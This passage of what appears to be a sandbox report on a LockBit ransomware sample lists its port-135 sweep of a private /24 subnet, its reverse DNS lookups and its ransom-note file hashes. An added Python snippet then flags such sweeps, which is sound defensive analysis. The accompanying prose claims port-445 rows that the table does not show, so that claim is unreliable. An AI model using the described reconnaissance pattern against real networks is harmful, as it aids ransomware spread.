| N/A | 10.127.0.75:135 | tcp | |
| N/A | 10.127.0.76:135 | tcp | |
| N/A | 10.127.0.77:135 | tcp | |
| N/A | 10.127.0.78:135 | tcp | |
| N/A | 10.127.0.79:135 | tcp | |
| N/A | 10.127.0.80:135 | tcp | |
| N/A | 10.127.0.81:135 | tcp | |
| N/A | 10.127.0.82:135 | tcp | |
| N/A | 10.127.0.83:135 | tcp | |
| N/A | 10.127.0.84:135 | tcp | |
| N/A | 10.127.0.85:135 | tcp | |
| N/A | 10.127.0.86:135 | tcp | |
| N/A | 10.127.0.87:135 | tcp | |
| N/A | 10.127.0.88:135 | tcp | |
| N/A | 10.127.0.89:135 | tcp | |
| N/A | 10.127.0.90:135 | tcp | |
| N/A | 10.127.0.91:135 | tcp | |
| N/A | 10.127.0.92:135 | tcp | |
| N/A | 10.127.0.93:135 | tcp | |
| N/A | 10.127.0.94:135 | tcp | |
| N/A | 10.127.0.95:135 | tcp | |
| N/A | 10.127.0.96:135 | tcp | |
| N/A | 10.127.0.97:135 | tcp | |
| N/A | 10.127.0.98:135 | tcp | |
| N/A | 10.127.0.99:135 | tcp | |
| N/A | 10.127.0.100:135 | tcp | |
| N/A | 10.127.0.101:135 | tcp | |
| N/A | 10.127.0.102:135 | tcp | |
| N/A | 10.127.0.103:135 | tcp | |
| N/A | 10.127.0.104:135 | tcp | |
| N/A | 10.127.0.105:135 | tcp | |
| N/A | 10.127.0.122:135 | tcp | |
| N/A | 10.127.0.106:135 | tcp | |
| N/A | 10.127.0.123:135 | tcp | |
| N/A | 10.127.0.107:135 | tcp | |
| N/A | 10.127.0.124:135 | tcp | |
| N/A | 10.127.0.108:135 | tcp | |
| N/A | 10.127.0.125:135 | tcp | |
| N/A | 10.127.0.109:135 | tcp | |
| N/A | 10.127.0.126:135 | tcp | |
| N/A | 10.127.0.127:135 | tcp | |
| N/A | 10.127.0.111:135 | tcp | |
| N/A | 10.127.0.128:135 | tcp | |
| N/A | 10.127.0.112:135 | tcp | |
| N/A | 10.127.0.129:135 | tcp | |
| N/A | 10.127.0.113:135 | tcp | |
| N/A | 10.127.0.110:135 | tcp | |
| N/A | 10.127.0.114:135 | tcp | |
| N/A | 10.127.0.131:135 | tcp | |
| N/A | 10.127.0.130:135 | tcp | |
| N/A | 10.127.0.132:135 | tcp | |
| N/A | 10.127.0.136:135 | tcp | |
| N/A | 10.127.0.116:135 | tcp | |
| N/A | 10.127.0.133:135 | tcp | |
| N/A | 10.127.0.117:135 | tcp | |
| N/A | 10.127.0.134:135 | tcp | |
| N/A | 10.127.0.118:135 | tcp | |
| N/A | 10.127.0.135:135 | tcp | |
| N/A | 10.127.0.119:135 | tcp | |
| N/A | 10.127.0.193:135 | tcp | |
| N/A | 10.127.0.251:135 | tcp | |
| N/A | 10.127.0.250:135 | tcp | |
| N/A | 10.127.0.249:135 | tcp | |
| N/A | 10.127.0.248:135 | tcp | |
| N/A | 10.127.0.247:135 | tcp | |
| N/A | 10.127.0.246:135 | tcp | |
| N/A | 10.127.0.245:135 | tcp | |
| N/A | 10.127.0.244:135 | tcp | |
| N/A | 10.127.0.243:135 | tcp | |
| N/A | 10.127.0.115:135 | tcp | |
| N/A | 10.127.0.241:135 | tcp | |
| N/A | 10.127.0.240:135 | tcp | |
| N/A | 10.127.0.239:135 | tcp | |
| N/A | 10.127.0.238:135 | tcp | |
| N/A | 10.127.0.237:135 | tcp | |
| N/A | 10.127.0.236:135 | tcp | |
| N/A | 10.127.0.235:135 | tcp | |
| N/A | 10.127.0.234:135 | tcp | |
| N/A | 10.127.0.233:135 | tcp | |
| N/A | 10.127.0.232:135 | tcp | |
| N/A | 10.127.0.229:135 | tcp | |
| N/A | 10.127.0.230:135 | tcp | |
| N/A | 10.127.0.228:135 | tcp | |
| N/A | 10.127.0.227:135 | tcp | |
| N/A | 10.127.0.226:135 | tcp | |
| N/A | 10.127.0.225:135 | tcp | |
| N/A | 10.127.0.224:135 | tcp | |
| N/A | 10.127.0.223:135 | tcp | |
| N/A | 10.127.0.222:135 | tcp | |
| N/A | 10.127.0.221:135 | tcp | |
| N/A | 10.127.0.220:135 | tcp | |
| N/A | 10.127.0.242:135 | tcp | |
| N/A | 10.127.0.218:135 | tcp | |
| N/A | 10.127.0.219:135 | tcp | |
| N/A | 10.127.0.217:135 | tcp | |
| N/A | 10.127.0.215:135 | tcp | |
| N/A | 10.127.0.216:135 | tcp | |
| N/A | 10.127.0.214:135 | tcp | |
| N/A | 10.127.0.212:135 | tcp | |
| N/A | 10.127.0.213:135 | tcp | |
| N/A | 10.127.0.211:135 | tcp | |
| N/A | 10.127.0.210:135 | tcp | |
| N/A | 10.127.0.209:135 | tcp | |
| N/A | 10.127.0.208:135 | tcp | |
| N/A | 10.127.0.206:135 | tcp | |
| N/A | 10.127.0.205:135 | tcp | |
| N/A | 10.127.0.204:135 | tcp | |
| N/A | 10.127.0.203:135 | tcp | |
| N/A | 10.127.0.202:135 | tcp | |
| N/A | 10.127.0.201:135 | tcp | |
| N/A | 10.127.0.200:135 | tcp | |
| N/A | 10.127.0.199:135 | tcp | |
| N/A | 10.127.0.198:135 | tcp | |
| N/A | 10.127.0.195:135 | tcp | |
| N/A | 10.127.0.197:135 | tcp | |
| N/A | 10.127.0.196:135 | tcp | |
| N/A | 10.127.0.194:135 | tcp | |
| N/A | 10.127.0.192:135 | tcp | |
| N/A | 10.127.0.191:135 | tcp | |
| N/A | 10.127.0.190:135 | tcp | |
| N/A | 10.127.0.189:135 | tcp | |
| N/A | 10.127.0.188:135 | tcp | |
| N/A | 10.127.0.187:135 | tcp | |
| N/A | 10.127.0.186:135 | tcp | |
| N/A | 10.127.0.185:135 | tcp | |
| N/A | 10.127.0.184:135 | tcp | |
| N/A | 10.127.0.183:135 | tcp | |
| N/A | 10.127.0.182:135 | tcp | |
| N/A | 10.127.0.181:135 | tcp | |
| N/A | 10.127.0.180:135 | tcp | |
| N/A | 10.127.0.179:135 | tcp | |
| N/A | 10.127.0.178:135 | tcp | |
| N/A | 10.127.0.177:135 | tcp | |
| N/A | 10.127.0.176:135 | tcp | |
| N/A | 10.127.0.175:135 | tcp | |
| N/A | 10.127.0.174:135 | tcp | |
| N/A | 10.127.0.173:135 | tcp | |
| N/A | 10.127.0.172:135 | tcp | |
| N/A | 10.127.0.207:135 | tcp | |
| N/A | 10.127.0.170:135 | tcp | |
| N/A | 10.127.0.169:135 | tcp | |
| N/A | 10.127.0.168:135 | tcp | |
| N/A | 10.127.0.167:135 | tcp | |
| N/A | 10.127.0.166:135 | tcp | |
| N/A | 10.127.0.165:135 | tcp | |
| N/A | 10.127.0.164:135 | tcp | |
| N/A | 10.127.0.163:135 | tcp | |
| N/A | 10.127.0.162:135 | tcp | |
| N/A | 10.127.0.161:135 | tcp | |
| N/A | 10.127.0.160:135 | tcp | |
| N/A | 10.127.0.159:135 | tcp | |
| N/A | 10.127.0.158:135 | tcp | |
| N/A | 10.127.0.157:135 | tcp | |
| N/A | 10.127.0.156:135 | tcp | |
| N/A | 10.127.0.155:135 | tcp | |
| N/A | 10.127.0.154:135 | tcp | |
| N/A | 10.127.0.153:135 | tcp | |
| N/A | 10.127.0.152:135 | tcp | |
| N/A | 10.127.0.151:135 | tcp | |
| N/A | 10.127.0.150:135 | tcp | |
| N/A | 10.127.0.149:135 | tcp | |
| N/A | 10.127.0.148:135 | tcp | |
| N/A | 10.127.0.147:135 | tcp | |
| N/A | 10.127.0.146:135 | tcp | |
| N/A | 10.127.0.145:135 | tcp | |
| N/A | 10.127.0.144:135 | tcp | |
| N/A | 10.127.0.171:135 | tcp | |
| N/A | 10.127.0.143:135 | tcp | |
| N/A | 10.127.0.142:135 | tcp | |
| N/A | 10.127.0.141:135 | tcp | |
| N/A | 10.127.0.140:135 | tcp | |
| N/A | 10.127.0.139:135 | tcp | |
| N/A | 10.127.0.138:135 | tcp | |
| N/A | 10.127.0.121:135 | tcp | |
| N/A | 10.127.0.137:135 | tcp | |
| N/A | 10.127.0.120:135 | tcp | |
| N/A | 10.127.0.8:135 | tcp | |
| N/A | 10.127.0.7:135 | tcp | |
| N/A | 10.127.0.6:135 | tcp | |
| N/A | 10.127.0.5:135 | tcp | |
| N/A | 10.127.0.4:135 | tcp | |
| N/A | 10.127.0.3:135 | tcp | |
| N/A | 10.127.0.2:135 | tcp | |
| N/A | 10.127.0.0:135 | tcp | |
| N/A | 10.127.0.1:135 | tcp | |
| N/A | 10.127.0.252:135 | tcp | |
| N/A | 10.127.0.254:135 | tcp | |
| N/A | 10.127.0.253:135 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
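The tcp rows above cover nearly every address in 10.127.0.0/24 on 445 (SMB) and 135 (MS-RPC), a subnet sweep consistent with the sample looking for hosts to reach over the network; the udp rows are reverse (PTR) lookups sent to 8.8.8.8. The Python below is an added example, not part of this report or of the sample: it parses rows in this table's layout, flags any /24 that is probed on 445 or 135 across many distinct hosts, and decodes the in-addr.arpa names back to the addresses being looked up. The embedded rows are a constructed subset of the table, and the port list and host threshold are assumptions chosen for illustration.

```python
"""Summarise a sandbox network table: flag SMB/RPC subnet sweeps and decode PTR lookups.

Added example, not part of the sandbox report. Rows are in the report's own
layout: | country | ip:port | query or proto | proto or empty |.
"""
import ipaddress
from collections import defaultdict

# Constructed sample: a subset of the report's rows (12 SMB, 3 RPC, 2 DNS).
SAMPLE_ROWS = """\
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.9:135 | tcp | |
| N/A | 10.127.0.10:135 | tcp | |
| N/A | 10.127.0.11:135 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
"""

# Ports a ransomware sample probes when hunting for hosts to encrypt or pivot through
# (assumed list for this example).
SWEEP_PORTS = {445: "SMB", 135: "MS-RPC"}


def parse_row(line):
    """Return a dict for one table row, or None for header/blank lines."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) < 3 or ":" not in cells[1]:
        return None
    ip, port = cells[1].rsplit(":", 1)
    tail = cells[2:]
    # tcp rows carry the protocol in the third cell, udp rows in the fourth.
    proto = next((c for c in tail if c in ("tcp", "udp")), "")
    query = next((c for c in tail if c and c not in ("tcp", "udp")), "")
    return {"country": cells[0], "ip": ip, "port": int(port), "proto": proto, "query": query}


def ptr_to_ip(name):
    """Decode a reverse-lookup name such as 183.59.114.20.in-addr.arpa to 20.114.59.183."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        return None
    return ".".join(reversed(octets))


def find_sweeps(rows, min_hosts=10):
    """Group TCP destinations by (/24, port) and return (subnet, port, service, hosts)
    for every group that touched at least min_hosts distinct addresses."""
    seen = defaultdict(set)
    for r in rows:
        if r["proto"] != "tcp" or r["port"] not in SWEEP_PORTS:
            continue
        net = ipaddress.ip_network(f"{r['ip']}/24", strict=False)
        seen[(str(net), r["port"])].add(r["ip"])
    return sorted(
        (net, port, SWEEP_PORTS[port], len(ips))
        for (net, port), ips in seen.items()
        if len(ips) >= min_hosts
    )


def ptr_targets(rows):
    """Addresses the sample asked the resolver about via PTR queries."""
    targets = set()
    for r in rows:
        ip = ptr_to_ip(r["query"])
        if ip:
            targets.add(ip)
    return sorted(targets)


def summarize(table_text, min_hosts=10):
    rows = [r for r in map(parse_row, table_text.splitlines()) if r]
    return {"rows": len(rows), "sweeps": find_sweeps(rows, min_hosts), "ptr": ptr_targets(rows)}


if __name__ == "__main__":
    report = summarize(SAMPLE_ROWS, min_hosts=3)
    for net, port, svc, n in report["sweeps"]:
        print(f"sweep: {n} hosts in {net} on {port}/{svc}")
    print("PTR lookups for:", ", ".join(report["ptr"]))
```

Run it against the full table (paste the rows into SAMPLE_ROWS or read them from a file) with the default threshold and the 445 and 135 sweeps over 10.127.0.0/24 both surface; the PTR decoding turns the udp rows into the six public addresses the sample resolved, which are the ones worth checking in passive DNS.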
Files
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\Restore-My-Files.txt
| MD5 | 799161fca9a3167f25cc591922e9d4bf |
| SHA1 | 578a60791842ac09f171a72b6cc2997b8307b4a1 |
| SHA256 | 6ebba29a420264342daf19a0d5d1dd36ecd56f5082b1d74d95733bc210ec75df |
| SHA512 | 0b23abb807fc49f995a0d3a8bce125770ad6b2cb9395e2d5317bdce394fddd165e1779c7434c91e479996f6caad88e6179bb13ac406aacc236b882cbc0381bb6 |
C:\Users\Admin\Desktop\LockBit-note.hta
| MD5 | 1ab66d44b4dfadff2a914174e24c8cf2 |
| SHA1 | 99214f760f492208095d8091d4b874df871858e5 |
| SHA256 | fc17dec8009c6af6add2a03807cc1ad8b08c2f34a0bff4922ecce9cba85de62e |
| SHA512 | fbb46563c2b84e1e36980a818ddae1341f899e6d6159216c45b9be37da558b633b4f1243d0f9665434f31dd5b7a2e5d062a50506b7a5be57897ede5c85077e88 |